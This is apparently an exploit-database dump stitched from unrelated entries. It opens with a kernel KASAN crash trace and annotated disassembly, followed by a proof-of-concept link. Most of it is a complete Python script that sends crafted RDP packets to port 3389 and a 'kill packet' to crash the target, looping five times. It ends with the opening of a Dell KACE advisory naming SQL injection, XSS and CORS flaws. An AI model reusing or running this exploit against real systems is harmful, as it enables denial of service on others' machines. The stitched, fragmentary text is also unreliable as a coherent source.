<4>[ 448.087779] c4 2684 36e0: ffffffbe224a7d80 0000000000000000 ffffffd7fabb3a00 ffffffd7fabb3a00
<4>[ 448.087784] c4 2684 3700: 0000000100150015 ffffffd8929f7e00 0000000180150014 ffffffd899803b00
<4>[ 448.087789] c4 2684 3720: ffffffd87e3b3830 ffffffa68a078b38 ffffffbe224a7d80 ffffffd8929f7ff0
<4>[ 448.087794] c4 2684 3740: ffffffd7fabb3a00 e95cc056ac940c73 0000000000000000 dead0000000000ff
<4>[ 448.087799] c4 2684 3760: 0000000000000000 ffffffd8929f7ff0 0000000000000000 fffffffffe8c0000
<4>[ 448.087804] c4 2684 3780: ffffffd87e3b3a08 0000000000000000 ffffffd87e3b3a2b ffffff8b0fc76745
<4>[ 448.087808] c4 2684 37a0: ffffff8b0fc76746 0000000000000040
<4>[ 448.087813] c4 2684 [<ffffffa68a07bbbc>] qlist_free_all+0x3c/0x80
<4>[ 448.087819] c4 2684 [<ffffffa68a07bf9c>] quarantine_reduce+0x17c/0x1a0
<4>[ 448.087824] c4 2684 [<ffffffa68a07a1b4>] kasan_kmalloc+0xe0/0xe4
<4>[ 448.087828] c4 2684 [<ffffffa68a07a964>] kasan_slab_alloc+0x14/0x1c
<4>[ 448.087832] c4 2684 [<ffffffa68a078030>] kmem_cache_alloc+0x144/0x27c
<4>[ 448.087840] c4 2684 [<ffffffa68a15d0dc>] ext4_inode_attach_jinode+0x9c/0x118
<4>[ 448.087844] c4 2684 [<ffffffa68a150d74>] ext4_file_open+0xc8/0x21c
<4>[ 448.087848] c4 2684 [<ffffffa68a087488>] do_dentry_open+0x350/0x4ec
<4>[ 448.087851] c4 2684 [<ffffffa68a087930>] finish_open+0x74/0xa8
<4>[ 448.087857] c4 2684 [<ffffffa68a09fa34>] path_openat+0x980/0x1404
<4>[ 448.087861] c4 2684 [<ffffffa68a0a1a50>] do_filp_open+0x98/0x188
<4>[ 448.087866] c4 2684 [<ffffffa68a089004>] do_sys_open+0x170/0x2d4
<4>[ 448.087869] c4 2684 [<ffffffa68a0891a0>] SyS_openat+0x10/0x18
<4>[ 448.087875] c4 2684 [<ffffffa689e842b0>] el0_svc_naked+0x24/0x28
<0>[ 448.087881] c4 2684 Code: 14000002 aa1403f3 aa1503e0 b40001f5 (b980c401)
<4>[ 448.087944] c4 2684 ---[ end trace 8d4DBGC
==================================
The KASAN report points to instruction 267c in the following assembly:
==================================
0000000000002630 <set_page_dirty>:
{
2630: a9bd7bfd stp x29, x30, [sp, #-48]!
2634: 910003fd mov x29, sp
2638: a90153f3 stp x19, x20, [sp, #16]
263c: f90013f5 str x21, [sp, #32]
2640: aa0003f3 mov x19, x0
struct address_space *mapping = page_mapping(page);
2644: 94000000 bl 0 <page_mapping>
2648: aa0003f4 mov x20, x0
264c: d5384115 mrs x21, sp_el0
if (current->jh_task_flags && mapping)
2650: 9128a2a0 add x0, x21, #0xa28
2654: 94000000 bl 0 <__asan_load4>
2658: b94a2aa0 ldr w0, [x21, #2600]
265c: 340000a0 cbz w0, 2670 <set_page_dirty+0x40>
2660: b40003b4 cbz x20, 26d4 <set_page_dirty+0xa4>
msleep(500);
2664: 52803e80 mov w0, #0x1f4 // #500
2668: 94000000 bl 0 <msleep>
266c: 14000002 b 2674 <set_page_dirty+0x44>
if (likely(mapping)) {
2670: b4000334 cbz x20, 26d4 <set_page_dirty+0xa4>
int (*spd)(struct page *) = mapping->a_ops->set_page_dirty;
2674: 9101a280 add x0, x20, #0x68
2678: 94000000 bl 0 <__asan_load8>
267c: f9403694 ldr x20, [x20, #104]
2680: 91006280 add x0, x20, #0x18
2684: 94000000 bl 0 <__asan_load8>
2688: f9400e94 ldr x20, [x20, #24]
268c: aa1303e0 mov x0, x19
2690: 94000000 bl 0 <__asan_load8>
2694: f9400260 ldr x0, [x19]
==================================
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46941.zip
import socket, sys, struct
from OpenSSL import SSL
from impacket.structure import Structure
# I'm not responsible for what you use this to accomplish and should only be used for education purposes
# Could clean these up since I don't even use them
class TPKT(Structure):
commonHdr = (
('Version','B=3'),
('Reserved','B=0'),
('Length','>H=len(TPDU)+4'),
('_TPDU','_-TPDU','self["Length"]-4'),
('TPDU',':=""'),
)
class TPDU(Structure):
commonHdr = (
('LengthIndicator','B=len(VariablePart)+1'),
('Code','B=0'),
('VariablePart',':=""'),
)
def __init__(self, data = None):
Structure.__init__(self,data)
self['VariablePart']=''
class CR_TPDU(Structure):
commonHdr = (
('DST-REF','<H=0'),
('SRC-REF','<H=0'),
('CLASS-OPTION','B=0'),
('Type','B=0'),
('Flags','B=0'),
('Length','<H=8'),
)
class DATA_TPDU(Structure):
commonHdr = (
('EOT','B=0x80'),
('UserData',':=""'),
)
def __init__(self, data = None):
Structure.__init__(self,data)
self['UserData'] =''
class RDP_NEG_REQ(CR_TPDU):
structure = (
('requestedProtocols','<L'),
)
def __init__(self,data=None):
CR_TPDU.__init__(self,data)
if data is None:
self['Type'] = 1
def send_init_packets(host):
tpkt = TPKT()
tpdu = TPDU()
rdp_neg = RDP_NEG_REQ()
rdp_neg['Type'] = 1
rdp_neg['requestedProtocols'] = 1
tpdu['VariablePart'] = rdp_neg.getData()
tpdu['Code'] = 0xe0
tpkt['TPDU'] = tpdu.getData()
s = socket.socket()
s.connect((host, 3389))
s.sendall(tpkt.getData())
s.recv(8192)
ctx = SSL.Context(SSL.TLSv1_METHOD)
tls = SSL.Connection(ctx,s)
tls.set_connect_state()
tls.do_handshake()
return tls
# This can be fixed length now buttfuckit
def send_client_data(tls):
p = "\x03\x00\x01\xca\x02\xf0\x80\x7f\x65\x82\x07\xc2\x04\x01\x01\x04\x01\x01\x01\x01\xff\x30\x19\x02\x01\x22\x02\x01\x02\x02\x01\x00\x02\x01\x01\x02\x01\x00\x02\x01\x01\x02\x02\xff\xff\x02\x01\x02\x30\x19\x02\x01\x01\x02\x01\x01\x02\x01\x01\x02\x01\x01\x02\x01\x00\x02\x01\x01\x02\x02\x04\x20\x02\x01\x02\x30\x1c\x02\x02\xff\xff\x02\x02\xfc\x17\x02\x02\xff\xff\x02\x01\x01\x02\x01\x00\x02\x01\x01\x02\x02\xff\xff\x02\x01\x02\x04\x82\x01\x61\x00\x05\x00\x14\x7c\x00\x01\x81\x48\x00\x08\x00\x10\x00\x01\xc0\x00\x44\x75\x63\x61\x81\x34\x01\xc0\xea\x00\x0a\x00\x08\x00\x80\x07\x38\x04\x01\xca\x03\xaa\x09\x04\x00\x00\xee\x42\x00\x00\x44\x00\x45\x00\x53\x00\x4b\x00\x54\x00\x4f\x00\x50\x00\x2d\x00\x46\x00\x38\x00\x34\x00\x30\x00\x47\x00\x49\x00\x4b\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xca\x01\x00\x00\x00\x00\x00\x18\x00\x0f\x00\xaf\x07\x62\x00\x63\x00\x37\x00\x38\x00\x65\x00\x66\x00\x36\x00\x33\x00\x2d\x00\x39\x00\x64\x00\x33\x00\x33\x00\x2d\x00\x34\x00\x31\x00\x39\x38\x00\x38\x00\x2d\x00\x39\x00\x32\x00\x63\x00\x66\x00\x2d\x00\x00\x31\x00\x62\x00\x32\x00\x64\x00\x61\x00\x42\x42\x42\x42\x07\x00\x01\x00\x00\x00\x56\x02\x00\x00\x50\x01\x00\x00\x00\x00\x64\x00\x00\x00\x64\x00\x00\x00\x04\xc0\x0c\x00\x15\x00\x00\x00\x00\x00\x00\x00\x02\xc0\x0c\x00\x1b\x00\x00\x00\x00\x00\x00\x00\x03\xc0\x38\x00\x04\x00\x00\x00\x72\x64\x70\x73\x6e\x64\x00\x00\x0f\x00\x00\xc0\x63\x6c\x69\x70\x72\x64\x72\x00\x00\x00\xa0\xc0\x64\x72\x64\x79\x6e\x76\x63\x00\x00\x00\x80\xc0\x4d\x53\x5f\x54\x31\x32\x30\x00\x00\x00\x00\x00"
size0 = struct.pack(">h", len(p))
size1 = struct.pack(">h", len(p)-12)
size2 = struct.pack(">h", len(p)-109)
size3 = struct.pack(">h", len(p)-118)
size4 = struct.pack(">h", len(p)-132)
size5 = struct.pack(">h", len(p)-390)
ba = bytearray()
ba.extend(map(ord, p))
ba[2] = size0[0]
ba[3] = size0[1]
ba[10] = size1[0]
ba[11] = size1[1]
ba[107] = size2[0]
ba[108] = size2[1]
ba[116] = 0x81
ba[117] = size3[1]
ba[130] = 0x81
ba[131] = size4[1]
ba[392] = size5[1]
tls.sendall(bytes(ba))
tls.recv(8192)
def send_client_info(tls):
p = b"\x03\x00\x01\x61\x02\xf0\x80\x64\x00\x07\x03\xeb\x70\x81\x52\x40\x00\xa1\xa5\x09\x04\x09\x04\xbb\x47\x03\x00\x00\x00\x0e\x00\x08\x00\x00\x00\x00\x00\x00\x00\x41\x00\x41\x00\x41\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00\x74\x00\x65\x00\x73\x00\x74\x00\x00\x00\x00\x00\x00\x00\x02\x00\x1c\x00\x31\x00\x39\x00\x32\x00\x2e\x00\x41\x41\x41\x00\x38\x00\x2e\x00\x32\x00\x33\x00\x32\x00\x2e\x00\x31\x00\x00\x00\x40\x00\x43\x00\x3a\x00\x5c\x00\x57\x00\x49\x00\x4e\x00\x41\x41\x41\x00\x57\x00\x53\x00\x5c\x00\x73\x00\x79\x00\x73\x00\x74\x00\x65\x00\x6d\x00\x33\x00\x32\x00\x5c\x00\x6d\x00\x73\x00\x74\x00\x73\x00\x63\x00\x61\x00\x78\x00\x2e\x00\x64\x00\x6c\x00\x6c\x00\x00\x00\xa4\x01\x00\x00\x4d\x00\x6f\x00\x75\x00\x6e\x00\x74\x00\x61\x00\x69\x00\x6e\x00\x20\x00\x53\x00\x74\x00\x61\x00\x6e\x00\x64\x00\x61\x00\x72\x00\x64\x00\x20\x00\x54\x00\x69\x00\x6d\x00\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x01\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4d\x00\x6f\x00\x75\x00\x6e\x00\x74\x00\x61\x00\x69\x00\x6e\x00\x20\x00\x44\x00\x61\x00\x79\x00\x6c\x00\x69\x00\x67\x00\x68\x00\x74\x00\x20\x00\x54\x00\x69\x00\x6d\x00\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x02\x00\x02\x00\x00\x00\x00\x00\x00\x00\xc4\xff\xff\xff\x01\x00\x00\x00\x06\x00\x00\x00\x00\x00\x64\x00\x00\x00"
tls.sendall(p)
def send_channel_packets(tls):
p1 = b"\x03\x00\x00\x0c\x02\xf0\x80\x04\x01\x00\x01\x00"
tls.sendall(p1)
p2 = b"\x03\x00\x00\x08\x02\xf0\x80\x28"
tls.sendall(p2)
tls.recv(1024)
p4 = b"\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x07\x03\xeb"
tls.sendall(p4)
tls.recv(1024)
p5 = b"\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x07\x03\xec"
tls.sendall(p5)
tls.recv(1024)
p6 = b"\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x07\x03\xed"
tls.sendall(p6)
tls.recv(1024)
p7 = b"\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x07\x03\xee"
tls.sendall(p7)
tls.recv(1024)
p8 = b"\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x07\x03\xef"
tls.sendall(p8)
tls.recv(1024)
def send_confirm_active(tls, shareid):
p = "\x03\x00\x02\x63\x02\xf0\x80\x64\x00\x07\x03\xeb\x70\x82\x54\x54\x02\x13\x00\xf0\x03\xea\x03\x01\x00\xea\x03\x06\x00\x3e\x02\x4d\x53\x54\x53\x43\x00\x17\x00\x00\x00\x01\x00\x18\x00\x01\x00\x03\x00\x00\x02\x00\x00\x00\x00\x1d\x04\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x1c\x00\x20\x00\x01\x00\x01\x00\x01\x00\x80\x07\x38\x04\x00\x00\x01\x00\x01\x00\x00\x1a\x01\x00\x00\x00\x03\x00\x58\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x14\x00\x00\x00\x01\x00\x00\x00\xaa\x00\x01\x01\x01\x01\x01\x00\x00\x01\x01\x01\x00\x01\x00\x00\x00\x01\x01\x01\x01\x01\x01\x01\x01\x00\x01\x01\x01\x00\x00\x00\x00\x00\xa1\x06\x06\x00\x00\x00\x00\x00\x00\x84\x03\x00\x00\x00\x00\x00\xe4\x04\x00\x00\x13\x00\x28\x00\x03\x00\x00\x03\x78\x00\x00\x00\x78\x00\x00\x00\xfc\x09\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x08\x00\x06\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x0c\x00\x00\x00\x00\x00\x02\x00\x02\x00\x08\x00\x0a\x00\x01\x00\x14\x00\x15\x00\x09\x00\x08\x00\x00\x00\x00\x00\x0d\x00\x58\x00\x91\x00\x20\x00\x09\x04\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x08\x00\x01\x00\x00\x00\x0e\x00\x08\x00\x01\x00\x00\x00\x10\x00\x34\x00\xfe\x00\x04\x00\xfe\x00\x04\x00\xfe\x00\x08\x00\xfe\x00\x08\x00\xfe\x00\x10\x00\xfe\x00\x20\x00\xfe\x00\x40\x00\xfe\x00\x80\x00\xfe\x00\x00\x01\x40\x00\x00\x08\x00\x01\x00\x01\x03\x00\x00\x00\x0f\x00\x08\x00\x01\x00\x00\x00\x11\x00\x0c\x00\x01\x00\x00\x00\x00\x28\x64\x00\x14\x00\x0c\x00\x01\x00\x00\x00\x00\x00\x00\x00\x15\x00\x0c\x00\x02\x00\x00\x00\x00\x0a\x00\x01\x1a\x00\x08\x00\xaf\x94\x00\x00\x1c\x00\x0c\x00\x12\x00\x00\x00\x00\x00\x00\x00\x1b\x00\x06\x00\x01\x00\x1e\x00\x08\x00\x01\x00\x00\x00\x18\x00\x0b\x00\x02\x00\x00\x00\x03\x0c\x00\x1d\x00\x5f\x00\x02\xb9\x1b\x8d\xca\x0f\x00\x4f\x15\x58\x9f\xae\x2d\x1a\x87\xe2\xd6\x01\x03\x00\x01\x01\x03\xd4\xcc\x44\x27\x8a\x9d\x74\x4e\x80\x3c\x0e\xcb\xee\xa1\x9c\x54\x05\x31\x00\x31\x00\x00\x00\x01\x00\x00\x00\x25\x00\x00\x00\xc0\xcb\x08\x00\x00\x00\x01\x00\xc1\xcb\x1d\x00\x00\x00\x01\xc0\xcf\x02\x00\x08\x00\x00\x01\x40\x00\x02\x01\x01\x01\x00\x01\x40\x00\x02\x01\x01\x04"
ba = bytearray()
ba.extend(map(ord, p))
tls.sendall(bytes(ba))
def send_establish_session(tls):
p = b"\x03\x00\x00\x24\x02\xf0\x80\x64\x00\x07\x03\xeb\x70\x16\x16\x00\x17\x00\xf0\x03\xea\x03\x01\x00\x00\x01\x08\x00\x1f\x00\x00\x00\x01\x00\xea\x03"
tls.sendall(p)
p = b"\x03\x00\x00\x28\x02\xf0\x80\x64\x00\x07\x03\xeb\x70\x1a\x1a\x00\x17\x00\xf0\x03\xea\x03\x01\x00\x00\x01\x0c\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00"
tls.sendall(p)
p = b"\x03\x00\x00\x28\x02\xf0\x80\x64\x00\x07\x03\xeb\x70\x1a\x1a\x00\x17\x00\xf0\x03\xea\x03\x01\x00\x00\x01\x0c\x00\x14\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
tls.sendall(p)
p = b"\x03\x00\x05\x81\x02\xf0\x80\x64\x00\x07\x03\xeb\x70\x85\x72\x72\x05\x17\x00\xf0\x03\xea\x03\x01\x00\x00\x01\x00\x00\x2b\x00\x00\x00\x00\x00\x00\x00\xa9\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa9\x00\x00\x00\x00\x00\x02\x00\x00\x00\xa3\xce\x20\x35\xdb\x94\xa5\xe6\x0d\xa3\x8c\xfb\x64\xb7\x63\xca\xe7\x9a\x84\xc1\x0d\x67\xb7\x91\x76\x71\x21\xf9\x67\x96\xc0\xa2\x77\x5a\xd8\xb2\x74\x4f\x30\x35\x2b\xe7\xb0\xd2\xfd\x81\x90\x1a\x8f\xd5\x5e\xee\x5a\x6d\xcb\xea\x2f\xa5\x2b\x06\xe9\x0b\x0b\xa6\xad\x01\x2f\x7a\x0b\x7c\xff\x89\xd3\xa3\xe1\xf8\x00\x96\xa6\x8d\x9a\x42\xfc\xab\x14\x05\x8f\x16\xde\xc8\x05\xba\xa0\xa8\xed\x30\xd8\x67\x82\xd7\x9f\x84\xc3\x38\x27\xda\x61\xe3\xa8\xc3\x65\xe6\xec\x0c\xf6\x36\x24\xb2\x0b\xa6\x17\x1f\x46\x30\x16\xc7\x73\x60\x14\xb5\xf1\x3a\x3c\x95\x7d\x7d\x2f\x74\x7e\x56\xff\x9c\xe0\x01\x32\x9d\xf2\xd9\x35\x5e\x95\x78\x2f\xd5\x15\x6c\x18\x34\x0f\x43\xd7\x2b\x97\xa9\xb4\x28\xf4\x73\x6c\x16\xdb\x43\xd7\xe5\x58\x0c\x5a\x03\xe3\x73\x58\xd7\xd9\x76\xc2\xfe\x0b\xd7\xf4\x12\x43\x1b\x70\x6d\x74\xc2\x3d\xf1\x26\x60\x58\x80\x31\x07\x0e\x85\xa3\x95\xf8\x93\x76\x99\x9f\xec\xa0\xd4\x95\x5b\x05\xfa\x4f\xdf\x77\x8a\x7c\x29\x9f\x0b\x4f\xa1\xcb\xfa\x95\x66\xba\x47\xe3\xb0\x44\xdf\x83\x03\x44\x24\xf4\x1e\xf2\xe5\xcb\xa9\x53\x04\xc2\x76\xcb\x4d\xc6\xc2\xd4\x3f\xd3\x8c\xb3\x7c\xf3\xaa\xf3\x93\xfe\x25\xbd\x32\x7d\x48\x6e\x93\x96\x68\xe5\x18\x2b\xea\x84\x25\x69\x02\xa5\x38\x65\x6f\x0f\x9f\xf6\xa1\x3a\x1d\x22\x9d\x3f\x6d\xe0\x4c\xee\x8b\x24\xf0\xdc\xff\x70\x52\xa7\x0d\xf9\x52\x8a\x1e\x33\x1a\x30\x11\x15\xd7\xf8\x95\xa9\xbb\x74\x25\x8c\xe3\xe9\x93\x07\x43\xf5\x50\x60\xf7\x96\x2e\xd3\xff\x63\xe0\xe3\x24\xf1\x10\x3d\x8e\x0f\x56\xbc\x2e\xb8\x90\x0c\xfa\x4b\x96\x68\xfe\x59\x68\x21\xd0\xff\x52\xfe\x5c\x7d\x90\xd4\x39\xbe\x47\x9d\x8e\x7a\xaf\x95\x4f\x10\xea\x7b\x7a\xd3\xca\x07\x28\x3e\x4e\x4b\x81\x0e\xf1\x5f\x1f\x8d\xbe\x06\x40\x27\x2f\x4a\x03\x80\x32\x67\x54\x2f\x93\xfd\x25\x5d\x6d\xa0\xad\x23\x45\x72\xff\xd1\xeb\x5b\x51\x75\xa7\x61\xe0\x3f\xe4\xef\xf4\x96\xcd\xa5\x13\x8a\xe6\x52\x74\x70\xbf\xc1\xf9\xfb\x68\x9e\xdd\x72\x8f\xb4\x44\x5f\x3a\xcb\x75\x2a\x20\xa6\x69\xd2\x76\xf9\x57\x46\x2b\x5b\xda\xba\x0f\x9b\xe0\x60\xe1\x8b\x90\x33\x41\x0a\x2d\xc5\x06\xfe\xd0\xf0\xfc\xde\x35\xd4\x1e\xaa\x76\x0b\xae\xf4\xd5\xbd\xfa\xf3\x55\xf5\xc1\x67\x65\x75\x1c\x1d\x5e\xe8\x3a\xfe\x54\x50\x23\x04\xae\x2e\x71\xc2\x76\x97\xe6\x39\xc6\xb2\x25\x87\x92\x63\x52\x61\xd1\x6c\x07\xc1\x1c\x00\x30\x0d\xa7\x2f\x55\xa3\x4f\x23\xb2\x39\xc7\x04\x6c\x97\x15\x7a\xd7\x24\x33\x91\x28\x06\xa6\xe7\xc3\x79\x5c\xae\x7f\x50\x54\xc2\x38\x1e\x90\x23\x1d\xd0\xff\x5a\x56\xd6\x12\x91\xd2\x96\xde\xcc\x62\xc8\xee\x9a\x44\x07\xc1\xec\xf7\xb6\xd9\x9c\xfe\x30\x1c\xdd\xb3\x3b\x93\x65\x3c\xb4\x80\xfb\xe3\x87\xf0\xee\x42\xd8\xcf\x08\x98\x4d\xe7\x6b\x99\x0a\x43\xed\x13\x72\x90\xa9\x67\xfd\x3c\x63\x36\xec\x55\xfa\xf6\x1f\x35\xe7\x28\xf3\x87\xa6\xce\x2e\x34\xaa\x0d\xb2\xfe\x17\x18\xa2\x0c\x4e\x5f\xf0\xd1\x98\x62\x4a\x2e\x0e\xb0\x8d\xb1\x7f\x32\x52\x8e\x87\xc9\x68\x7c\x0c\xef\xee\x88\xae\x74\x2a\x33\xff\x4b\x4d\xc5\xe5\x18\x38\x74\xc7\x28\x83\xf7\x72\x87\xfc\x79\xfb\x3e\xce\xd0\x51\x13\x2d\x7c\xb4\x58\xa2\xe6\x28\x67\x4f\xec\xa6\x81\x6c\xf7\x9a\x29\xa6\x3b\xca\xec\xb8\xa1\x27\x50\xb7\xef\xfc\x81\xbf\x5d\x86\x20\x94\xc0\x1a\x0c\x41\x50\xa9\x5e\x10\x4a\x82\xf1\x74\x1f\x78\x21\xf5\x70\x61\x24\x00\x3d\x47\x5f\xf3\x25\x80\x3c\x4b\xea\xa3\xf4\x77\xea\xa1\x42\x1a\x17\x0f\x6d\xa8\x35\x9e\x91\x26\x34\x43\x04\xc6\xc6\x5b\x21\x7d\x8c\xc7\x22\x91\x7b\x2c\x2d\x2f\xd6\x7e\xa5\x52\xa8\x08\x80\xeb\x60\xd1\x44\x09\x8e\x3c\xa1\xaa\x67\x60\x0a\x26\xc6\xb5\xc6\x79\xa6\x4f\x8b\x8c\x25\x5c\xf1\x0b\x23\xf4\xd8\xa6\x6d\xf1\x91\x78\xf9\xe5\x2a\x50\x2f\x5a\x44\x22\xd9\x19\x5c\xaf\xd6\xac\x97\xa2\xf8\x0d\x0c\xe3\xdd\x88\x48\x98\x28\x0b\x8b\xbd\x76\xdc\xde\xca\xe2\xc2\x4a\x87\x50\xd4\x8c\x77\x5a\xd8\xb2\x74\x4f\x30\x35\xbf\x28\xae\xd9\xa2\x98\xa5\xbc\x60\xca\xb8\x90\x4d\x20\x46\xd9\x8a\x1a\x30\x01\x8b\x38\x63\x1a\x57\x09\x51\x46\x95\x9b\xd8\x80\x0c\xb0\x77\x24\xbf\x2b\xd3\x57\x22\xd9\x19\x5c\xaf\xd6\xac\x97\xa2\xf8\x0d\x0c\xe3\xdd\x88\x48\x98\x28\x0b\x8b\xbd\x76\xdc\xde\xca\xe2\xc2\x4a\x87\x50\xd4\x8c\x56\x92\x38\xed\x6b\x9b\x5b\x1f\xba\x53\xa1\x0e\xf7\x75\x10\x53\x22\x4c\x0a\x75\x88\x54\x69\x3f\x3b\xf3\x18\x67\x6b\x0f\x19\xd1\x00\x25\x86\xcd\xa8\xd9\xdd\x1d\x8d\x26\x87\x54\xd9\x79\xc0\x74\x65\x90\xd7\x33\x32\xaf\xba\x9d\x5a\xd5\x6c\x7c\xa1\x47\xe1\x49\x6e\x1c\xce\x9f\x62\xaa\x26\x16\x3f\x3c\xec\x5b\x49\xe5\xc0\x60\xd4\xbe\xa7\x88\xbc\xa1\x9f\x29\x71\x8c\xeb\x69\xf8\x73\xfb\xaf\x29\xaa\x40\x1b\xe5\x92\xd2\x77\xa7\x2b\xfb\xb6\x77\xb7\x31\xfb\xdc\x1e\x63\x63\x7d\xf2\xfe\x3c\x6a\xba\x0b\x20\xcb\x9d\x64\xb8\x31\x14\xe2\x70\x07\x2c\xdf\x9c\x6f\xb5\x3a\xc4\xd5\xb5\xc9\x3e\x9a\xd7\xd5\x30\xdc\x0e\x19\x89\xc6\x08\x88\xe1\xca\x81\xa6\x28\xdd\x9c\x74\x05\x11\xe7\xe1\xcc\xbc\xc7\x76\xdd\x55\xe2\xcc\xc2\xcb\xd3\xb6\x48\x01\xdd\xff\xba\xca\x31\xab\x26\x44\x1c\xdc\x06\x01\xdf\xf2\x90\x50\xb8\x6b\x8f\xe8\x29\xf0\xba\xec\xfb\x2d\xfd\x7a\xfc\x7f\x57\xbd\xea\x90\xf7\xcf\x92\x1e\xc4\x20\xd0\xb6\x9f\xd6\xdc\xa1\x82\xa9\x6c\x5e\x3e\x83\x41\x57\x73\xe9\xe7\x5a\x3f\xda\x24\x4f\x73\x5e\xf4\xe0\x92\x24\xbd\x0b\xd0\x3c\x49\x96\xb5\xb5\x05\x32\xcb\x58\x1d\x6f\x97\x51\xee\x0c\xdc\x0b\x2a\x60\xef\x97\x3e\x5a\x30\x81\x15\x91\xcf\x11\x07\x25\x2c\x41\xdb\x70\x72\xe1\x75\xf6\xa5\xff\xe8\x44\xe7\x03\xe3\x61\xaa\xdb\xe0\x07\x3d\x07\x0b\xe3\x5c\x09\xa9\x5e\x10\xfd\xcf\x74\x9e\x23\xf1\x30\x86\x16\xef\x25\x4e\xfe\xa4\x93\xa5\x80\x0a\x01\x39\xcc\x11\x7a\x6e\x94\x22\x5b\xd8\xc6\xc9\xa8\xdf\x13\x96\xb3\x91\x33\x6e\x87\xbb\x94\x63\x2d\x88\x64\xa7\x58\x89\xda\xdc\x7f\x2a\xe3\xa1\x66\xe5\xc8\x7f\xc2\xdb\xc7\x7d\x2f\xa9\x46\x28\x45\x69\xbc\xac\x9f\x85\x9e\xb0\x9f\x9a\x49\xb4\xb1\xcb"
tls.sendall(p)
p = b"\x03\x00\x00\x28\x02\xf0\x80\x64\x00\x07\x03\xeb\x70\x1a\x1a\x00\x17\x00\xf0\x03\xea\x03\x01\x00\x00\x01\x00\x00\x27\x00\x00\x00\x00\x00\x00\x00\x03\x00\x32\x00"
tls.sendall(p)
def send_kill_packet(tls, arch):
if arch == "32":
p = b"\x03\x00\x00\x2e\x02\xf0\x80\x64\x00\x07\x03\xef\x70\x14\x0c\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
elif arch == "64":
p = b"\x03\x00\x00\x2e\x02\xf0\x80\x64\x00\x07\x03\xef\x70\x14\x0c\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
else:
print("Make the second arguement '32' or '64' without quotes")
sys.exit()
tls.sendall(p)
def terminate_connection(tls):
p = b"\x03\x00\x00\x09\x02\xf0\x80\x21\x80"
tls.sendall(p)
def main(args):
tls = send_init_packets(args[1])
send_client_data(tls)
print("[+] ClientData Packet Sent")
send_channel_packets(tls)
print("[+] ChannelJoin/ErectDomain/AttachUser Sent")
send_client_info(tls)
print("[+] ClientInfo Packet Sent")
tls.recv(8192)
tls.recv(8192)
send_confirm_active(tls, None)
print("[+] ConfirmActive Packet Sent")
send_establish_session(tls)
print("[+] Session Established")
send_kill_packet(tls, args[2])
terminate_connection(tls)
print("[+] Vuln Should Trigger")
if __name__ == '__main__':
if len(sys.argv) != 3:
print("Usage: python poc.py 127.0.0.1 64")
sys.exit()
elif sys.argv[2] == '32' or '64':
# I've had to send the packets 5 times for hosts that havent
# had a terminal session since their last reboot. I think
# I know why but atm its just easier to send the exchange
# 5 times and it'll crash eventually. Most of the time its
# the first time though.
for _ in range(5):
main(sys.argv)
else:
print("Usage: python poc.py 127.0.0.1 64")
sys.exit()
# Exploit Title: [Dell Kace Appliance Multiple Vulnerabilities]
# Date: [12/04/2018]
# Exploit Author: [SlidingWindow], Twitter: @kapil_khot
# Vendor Homepage: [https://www.quest.com/products/kace-systems-management-appliance/]
# Affected Versions: [KACE SMA versions prior to 9.0.270 PATCH SEC2018_20180410]
# Tested on: [Quest Kace K1000 Appliance versions, 8.0.318, 8.0.320 and 9.0.270 ]
# CVE : [CVE-2018-5404,CVE-2018-5405,CVE-2018-5406]
#CERT Advisory: [https://www.kb.cert.org/vuls/id/877837/]
#Vendor Advisory: https://support.quest.com/kb/288310/cert-coordination-center-report-update
==================
#Product:-
==================
Quest KACE, formerly Dell KACE, is a company that specializes in computer appliances for systems management of information technology equipment. It also provides software for security, application virtualization, and systems management products.
==================
#Vulnerability:-
==================
The Dell Kace K1000 Appliance (Now, Quest Kace K1000) suffers from several vulnerabilities such as Multiple Blind SQL Injection, Stored Cross-Site-Scripting, and mis-configured CORS.
========================
